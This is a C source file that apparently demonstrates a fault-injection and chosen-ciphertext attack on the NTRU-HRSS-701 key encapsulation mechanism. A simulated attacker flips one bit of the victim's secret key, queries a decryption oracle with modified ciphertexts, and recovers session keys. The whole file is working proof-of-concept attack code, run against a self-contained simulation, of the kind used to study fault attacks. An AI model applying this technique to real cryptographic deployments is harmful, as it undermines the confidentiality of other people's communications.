-rw-r--r-- 5836 attackntrw-20220829/attackntrw.c raw
#include <stdio.h> #include <inttypes.h> #include <string.h> #include <assert.h> #include "crypto_hash_sha3256.h" #include "crypto_kem_ntruhrss701.h" #define PUBLICKEYBYTES crypto_kem_ntruhrss701_PUBLICKEYBYTES #define SECRETKEYBYTES crypto_kem_ntruhrss701_SECRETKEYBYTES #define CIPHERTEXTBYTES crypto_kem_ntruhrss701_CIPHERTEXTBYTES #define BYTES crypto_kem_ntruhrss701_BYTES #define keypair crypto_kem_ntruhrss701_keypair #define enc crypto_kem_ntruhrss701_enc #define dec crypto_kem_ntruhrss701_dec // ----- legitimate alice and bob #define TARGETS 10 unsigned char alice_pk[PUBLICKEYBYTES]; unsigned char alice_sk[SECRETKEYBYTES]; unsigned char alice_k[BYTES]; unsigned char bob_ct[TARGETS][CIPHERTEXTBYTES]; unsigned char bob_k[TARGETS][BYTES]; void alice_prep(void) { keypair(alice_pk,alice_sk); } void bob(void) { for (long long t = 0;t < TARGETS;++t) enc(bob_ct[t],bob_k[t],alice_pk); } void alice(void) { for (long long t = 0;t < TARGETS;++t) { dec(alice_k,bob_ct[t],alice_sk); assert(!memcmp(alice_k,bob_k[t],BYTES)); } } void alice_oracle(unsigned char *k,const unsigned char *ct) { for (long long t = 0;t < TARGETS;++t) assert(memcmp(ct,bob_ct[t],CIPHERTEXTBYTES)); dec(k,ct,alice_sk); } void alice_fault(void) { alice_sk[SECRETKEYBYTES-1] ^= 2; } // ----- for eve: useful subroutines from ntruhrss701 #define NTRU_N 701 #define NTRU_PACK_DEG (NTRU_N-1) #define NTRU_PACK_TRINARY_BYTES ((NTRU_PACK_DEG+4)/5) #define NTRU_OWCPA_MSGBYTES (2*NTRU_PACK_TRINARY_BYTES) #define PAD32(X) ((((X) + 31)/32)*32) #include <immintrin.h> typedef union{ /* align to 32 byte boundary for vmovdqa */ uint16_t coeffs[PAD32(NTRU_N)]; __m256i coeffs_x16[PAD32(NTRU_N)/16]; } poly; #define poly_lift crypto_kem_ntruhrss701_avx2_constbranchindex_poly_lift #define poly_S3_tobytes crypto_kem_ntruhrss701_avx2_constbranchindex_poly_S3_tobytes #define poly_trinary_Zq_to_Z3 crypto_kem_ntruhrss701_avx2_constbranchindex_poly_trinary_Zq_to_Z3 #define poly_Rq_inv crypto_kem_ntruhrss701_avx2_constbranchindex_poly_Rq_inv #define poly_Rq_sum_zero_frombytes crypto_kem_ntruhrss701_avx2_constbranchindex_poly_Rq_sum_zero_frombytes #define poly_Sq_mul crypto_kem_ntruhrss701_avx2_constbranchindex_poly_Sq_mul #define poly_Sq_frombytes crypto_kem_ntruhrss701_avx2_constbranchindex_poly_Sq_frombytes #define poly_Sq_tobytes crypto_kem_ntruhrss701_avx2_constbranchindex_poly_Sq_tobytes void poly_lift(poly *r, const poly *a); void poly_S3_tobytes(unsigned char msg[NTRU_PACK_TRINARY_BYTES], const poly *a); void poly_trinary_Zq_to_Z3(poly *r); void poly_Rq_inv(poly *r, const poly *a); void poly_Rq_sum_zero_frombytes(poly *r, const unsigned char *a); void poly_Sq_mul(poly *r, const poly *a, const poly *b); void poly_Sq_frombytes(poly *r, const unsigned char *a); void poly_Sq_tobytes(unsigned char *r, const poly *a); // ----- attack unsigned char eve_ct[CIPHERTEXTBYTES]; unsigned char eve_k[BYTES]; #define EVE_MODS (2*NTRU_N) unsigned char eve_k_stored[TARGETS][EVE_MODS][BYTES]; long long eve_match[EVE_MODS]; long long eve_m1x1[NTRU_N]; long long eve_reconstruction[NTRU_N]; unsigned char eve_rm[NTRU_OWCPA_MSGBYTES]; unsigned char eve_final_k[BYTES]; poly eve_pk_poly; poly eve_pk_inv; poly eve_m; poly eve_b; poly eve_r; poly eve_liftm; poly eve_ct_starting_poly; poly eve_ct_poly; void attack_onetarget(long long t) { poly_Rq_sum_zero_frombytes(&eve_ct_starting_poly,bob_ct[t]); for (long long start = 0;start < NTRU_N;++start) { if (eve_match[2*start]) eve_m1x1[start] = 1; else if (eve_match[2*start+1]) eve_m1x1[start] = -1; else eve_m1x1[start] = 0; } for (long long start = 0;start < NTRU_N;++start) eve_m.coeffs[start] = (3-eve_m1x1[(start+NTRU_N-1)%NTRU_N]+eve_m1x1[start])%3; for (long long start = 0;start < NTRU_N;++start) eve_m.coeffs[start] = (3+eve_m.coeffs[start]-eve_m.coeffs[NTRU_N-1])%3; // now follow (portions of) ref owcpa_dec to reconstruct r poly_S3_tobytes(eve_rm+NTRU_PACK_TRINARY_BYTES,&eve_m); poly_lift(&eve_liftm,&eve_m); for (long long i = 0;i < NTRU_N;++i) eve_b.coeffs[i] = eve_ct_starting_poly.coeffs[i] - eve_liftm.coeffs[i]; poly_Sq_mul(&eve_r,&eve_b,&eve_pk_inv); poly_trinary_Zq_to_Z3(&eve_r); poly_S3_tobytes(eve_rm,&eve_r); // and hash as in ref crypto_kem_dec crypto_hash_sha3256(eve_final_k,eve_rm,NTRU_OWCPA_MSGBYTES); for (long long i = 0;i < BYTES;++i) assert(bob_k[t][i] == eve_final_k[i]); printf("successfully broke plaintext %lld\n",t); } void attack(void) { poly_Rq_sum_zero_frombytes(&eve_pk_poly,alice_pk); poly_Rq_inv(&eve_pk_inv,&eve_pk_poly); for (long long epoch = 0;epoch < 2;++epoch) { for (long long t = 0;t < TARGETS;++t) { poly_Rq_sum_zero_frombytes(&eve_ct_starting_poly,bob_ct[t]); for (long long mod = 0;mod < EVE_MODS;++mod) { long long pos = mod/2; long long pos1 = (pos+1)%NTRU_N; long long offset = (mod%2) ? 2 : -2; for (long long i = 0;i < NTRU_N;++i) eve_ct_poly.coeffs[i] = eve_ct_starting_poly.coeffs[i]; eve_ct_poly.coeffs[pos] = eve_ct_starting_poly.coeffs[pos]+offset; eve_ct_poly.coeffs[pos1] = eve_ct_starting_poly.coeffs[pos1]-offset; poly_Sq_tobytes(eve_ct,&eve_ct_poly); alice_oracle(eve_k,eve_ct); if (epoch == 0) memcpy(eve_k_stored[t][mod],eve_k,BYTES); else eve_match[mod] = !memcmp(eve_k_stored[t][mod],eve_k,BYTES); } if (epoch == 0) printf("collected data for ciphertext %lld\n",t); else attack_onetarget(t); fflush(stdout); } if (epoch == 0) { // one single-bit fault at the end of epoch 0 alice_fault(); printf("fault!\n"); fflush(stdout); } } } int main() { alice_prep(); bob(); alice(); attack(); return 0; }